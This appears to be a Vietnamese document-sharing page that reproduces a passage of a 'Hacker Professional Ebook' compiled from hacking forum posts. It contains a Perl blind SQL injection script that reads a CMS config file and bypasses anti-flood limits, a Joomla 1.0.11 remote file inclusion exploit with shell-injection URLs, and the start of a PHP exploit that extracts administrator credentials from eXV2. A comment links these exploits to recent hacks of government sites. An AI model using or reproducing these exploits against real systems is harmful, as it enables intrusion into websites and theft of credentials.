1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 388 pot

6 62 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 78,05 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

# Modify the username's charset if it contain special char.. # sleep2 needed for bypass the antiflood protection... # If the username's length > 19 the exploit doesn't works... chắc đây

Trang 1

#

# magic_quotes_gpc=off

# ====================

# [SQL] and LOAD_FILE("C:/Program

Files/EasyPHP1-8/www/ixprim-1.2/html/mainfile.php")

# REGEXP("define(\"IXP_CODE\", '[PART_OF_IXP_CODE]");

#

# magic_quotes_gpc=on

# ===================

# [SQL] and

LOAD_FILE(concat(char(67),char(58),char(47),char(80),char(114),char(111),char (103),char(114),

#

char(97),char(109),char(32),char(70),char(105),char(108),char(101),char(115),char (47),char(69),

#

char(97),char(115),char(121),char(80),char(72),char(80),char(49),char(45),char(56 ),char(47),char(119),

#

char(119),char(119),char(47),char(105),char(120),char(112),char(114),char(105),c har(109),char(45),

#

char(49),char(46),char(50),char(47),char(104),char(116),char(109),char(108),char( 47),char(109),char(97),

#

char(105),char(110),char(102),char(105),char(108),char(101),char(46),char(112),c har(104),char(112)))

#

REGEXP(concat(char(73),char(88),char(80),char(95),char(67),char(79),char(68),c har(69),char(34),char(44),

# char(32),char(39),char([PART_OF_IXP_CODE])))

#

&sendreq(1,32,"load_file(concat(".concatchar($fpd)."))

REGEXP(concat(".concatchar("IXP_CODE\", '"));

exit(1);

# Determine if the sql request return true or false

# Modify the username's charset if it contain special char

# sleep(2) needed for bypass the antiflood protection

Trang 2

# If the username's length > 19 the exploit doesn't works

#

sub sendreq() {

my($start,$limit,$sql) = ($_[0],$_[1],$_[2]);

my($gchar,$char) = '';

@charset=(0 9) if $sql =~ /^(length|select%20uid)/;

@charset=(a z,0 9) if $sql =~ /^select%20uname/;

@charset=(a f,0 9) if $sql =~ /^(select%20pass|load_file)/;

for($y=$start;$y<=$limit;$y++) {

foreach $char (@charset) {

print STDERR "\r sploit> $gchar$char";

if($sql !~ /load_file/) {

$req = GET $bsql."%20and%20substr((".$sql."),$y,1)=".concatchar($char);} else {

$req = GET $bsql."%20and%20".$sql.",".concatchar($gchar.$char)."))";} sleep(2);

$res = ($ua->request($req))->content;

if($res =~ /<br \/> <div id="comments">/) {

$gchar = $char;

last;}}

if(($sql =~ /length/) and ($gchar.$char =~ /^([0-9]+)9$/)){

last;}}

print STDERR "\n";

return $gchar.$char;

}

sub concatchar() {

my $string = shift;

my $temp = '';

for($i=0;$i<length($string);$i++) {

$temp = "char(".ord(substr($string,$i,1)).")";

Trang 3

$temp = ',' if $i != (length($string)-1);

}

return $temp;

}

black_hat_cr(HCE)

Joomla 1.0.11 (newest) RFI - Vuln

Code:

> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-=

> [2006-Nov-06] register_globals is On

>

> Bug : include_once ( $mosConfig_absolute_path '/language/'

$mosConfig_lang '.php' );

>

> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ==-=-==-=

>

> Exploit :

www.target.com/Jooma/installation/index.php?mosConfig_absolute_path=[shell]?

> ->

www.target.com/Joomla/administrator/components/com_admin/admin.admin.html php?mosConfig_absolute_path=[shell]?

chắc đây là lý do 1 số site gov.vn vừa mới bị hack

micimacko(HCE)

Joomla Banner Component Index.PHP SQL Injection Vulnerability

Code:

#!/usr/bin/php -q -d short_open_tag=on

<?

print_r('

-

exV2 <= 2.0.4.3 "sort" SQL injection / administrative credentials

disclosure

exploit

mail: retrog@alice.it

site: http://retrogod.altervista.org

dork: "Powered by eXV2 Vers"

Trang 4

- ');

/*

this works regardless of php.ini settings

against Mysql >= 4.1 (allowing subs)

and if 'messages' module is enabled

*/

if ($argc<4) {

print_r('

- Usage: php '.$argv[0].' host path user pass OPTIONS

host: target server (ip/hostname)

path: path to exv2

user/pass: valide user credentials

Options:

-T[prefix: specify a table prefix, other than default (exv2_) -p[port]: specify a port other than 80

-P[ip:port]: specify a proxy

Example:

php '.$argv[0].' 2.2.2.2 /exv2/ rgod test -P1.1.1.1:80

php '.$argv[0].' 1.1.1.1 / rgod test -p81

- ');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

function quick_dump($string)

{

$result='';$exa='';$cont=0;

for ($i=0; $i<=strlen($string)-1; $i++)

{

if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))

{$result.=" ";}

else

{$result.=" ".$string[$i];}

Trang 5

if (strlen(dechex(ord($string[$i])))==2)

{$exa.=" ".dechex(ord($string[$i]));}

else

{$exa.=" 0".dechex(ord($string[$i]));}

$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} }

return $exa."\r\n".$result;

}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpacketii($packet)

{

global $proxy, $host, $port, $html, $proxy_regex;

if ($proxy=='') {

$ock=fsockopen(gethostbyname($host),$port);

if (!$ock) {

echo 'No response from '.$host.':'.$port; die;

}

}

else {

$c = preg_match($proxy_regex,$proxy);

if (!$c) {

echo 'Not a valid proxy ';die;

}

$parts=explode(':',$proxy);

echo "Connecting to ".$parts[0].":".$parts[1]." proxy \r\n"; $ock=fsockopen($parts[0],$parts[1]);

if (!$ock) {

echo 'No response from proxy ';die;

}

}

fputs($ock,$packet);

if ($proxy=='') {

$html='';

while (!feof($ock)) {

$html.=fgets($ock);

}

}

else {

$html='';

Ngày đăng: 04/07/2014, 12:20

Xem thêm

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN